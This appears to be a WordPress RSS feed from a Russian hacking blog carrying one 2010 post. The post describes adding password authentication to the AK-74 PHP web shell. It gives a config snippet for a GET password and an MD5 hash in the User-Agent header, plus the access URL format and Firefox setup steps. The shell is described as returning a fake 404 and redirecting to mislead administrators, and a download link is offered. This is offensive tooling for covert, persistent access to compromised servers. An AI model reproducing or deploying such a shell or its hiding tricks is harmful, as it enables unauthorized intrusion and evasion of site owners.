<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>по стопам webkill&#039;а &#187; web-shell</title>
	<atom:link href="http://blog.lukmus.ru/tag/web-shell/feed/" rel="self" type="application/rss+xml" />
	<link>http://blog.lukmus.ru</link>
	<description>это наш химический дом для печальных жителей Земли</description>
	<lastBuildDate>Sat, 21 Oct 2023 19:10:13 +0000</lastBuildDate>
	<language>ru-RU</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.4.2</generator>
		<item>
		<title>добавляем авторизацию к AK-74 Web-shell</title>
		<link>http://blog.lukmus.ru/2010/09/30/dobavlyaem-avtorizatsiyu-k-ak-74-web-shell/</link>
		<comments>http://blog.lukmus.ru/2010/09/30/dobavlyaem-avtorizatsiyu-k-ak-74-web-shell/#comments</comments>
		<pubDate>Thu, 30 Sep 2010 22:25:50 +0000</pubDate>
		<dc:creator>lukmus</dc:creator>
				<category><![CDATA[hack]]></category>
		<category><![CDATA[методы и способы]]></category>
		<category><![CDATA[AK-74]]></category>
		<category><![CDATA[PHP]]></category>
		<category><![CDATA[web-shell]]></category>
		<category><![CDATA[шелл]]></category>

		<guid isPermaLink="false">http://blog.lukmus.ru/?p=521</guid>
		<description><![CDATA[AK-74 &#8211; отличный шелл, там нет крутых наворотов, AJAX&#8217;а и прочей красоты, совершенно не нужной в таком деле. Однако там нет и еще одной вещи, на мой взгляд важной &#8211; авторизации. Вероятно, авторы шелла, к сожалению не знаю ссылки на создателей, думали, что любой пользователь сам в состоянии дописать авторизацию т.к. код скрипта прост и [...]]]></description>
			<content:encoded><![CDATA[<p><a href="http://blog.lukmus.ru/wp-content/uploads/2010/09/ak74.jpg"><img class="alignleft size-full wp-image-522" title="ak74" src="http://blog.lukmus.ru/wp-content/uploads/2010/09/ak74.jpg" alt="" width="171" height="128" /></a>AK-74 &#8211; отличный шелл, там нет крутых наворотов, AJAX&#8217;а и прочей красоты, совершенно не нужной в таком деле. Однако там нет и еще одной вещи, на мой взгляд важной &#8211; авторизации. Вероятно, авторы шелла, к сожалению не знаю ссылки на создателей, думали, что любой пользователь сам в состоянии дописать авторизацию т.к. код скрипта прост и нагляден. Там и вправду ничего сложного нет.<span id="more-521"></span></p>
<p>Вообщем мне понадобилось и я дописал пару строчек, выполняющих авторизацию.</p>
<p>Я предлагаю 2 вида авторизации:</p>
<ul>
<li>ввод пароля в адресной строке методом GET</li>
<li>хэш пароля в User-Agent браузера</li>
</ul>
<p>Второй способ мне больше нравится т.к. не надо ничего запоминать, однако в таком случае если вы зайдете с этого браузера на любой другой сайт, то ваш хэш с легкостью будет перехвачен и записан в лог апача. Поэтому лучше использовать 2 способа одновременно.</p>
<p>Конфиг авторизации лежит в самом начале скрипта шелла:<br />
<code>//---------------------config-<br />
$get_pass=md5("getpass"); //пароль по GET<br />
$ua_pass=md5("uapass"); //пароль по User-Agent<br />
$auth_var=array(<br />
'get_pass'=&gt;true, //вкл/выкл GET<br />
'user_agent'=&gt;false); //вкл/выкл User-Agent<br />
//----------------------------</code></p>
<p>В случае неудачной авторизации шелл выдаст ошибку 404 и немного изменит в адресной строке адрес т.е. заредиректит на схожий путь, тем самым запутав любопытного админа.</p>
<p>Ввод пароля по GET делается так:<br />
<code>/path/to/shell.php?kw=getpass</code></p>
<p>Для того, чтобы войти по User-Agent нужно вбить в браузер, чтобы он давал такой заголовок в пакете. Например в Firefox&#8217;е это делается так:</p>
<ul>
<li>в адресной строке вводим about:config</li>
<li>в поле фильтр вбиваем general.useragent.extra.firefox</li>
<li>дописываем в значение поля хэш нашего $ua_pass</li>
</ul>
<p>Скачать это дело можно <a rel="nofollow" href="http://www.sendspace.com/file/zn0b1s" target="_blank">тут</a>.</p>
]]></content:encoded>
			<wfw:commentRss>http://blog.lukmus.ru/2010/09/30/dobavlyaem-avtorizatsiyu-k-ak-74-web-shell/feed/</wfw:commentRss>
		<slash:comments>7</slash:comments>
		</item>
	</channel>
</rss>
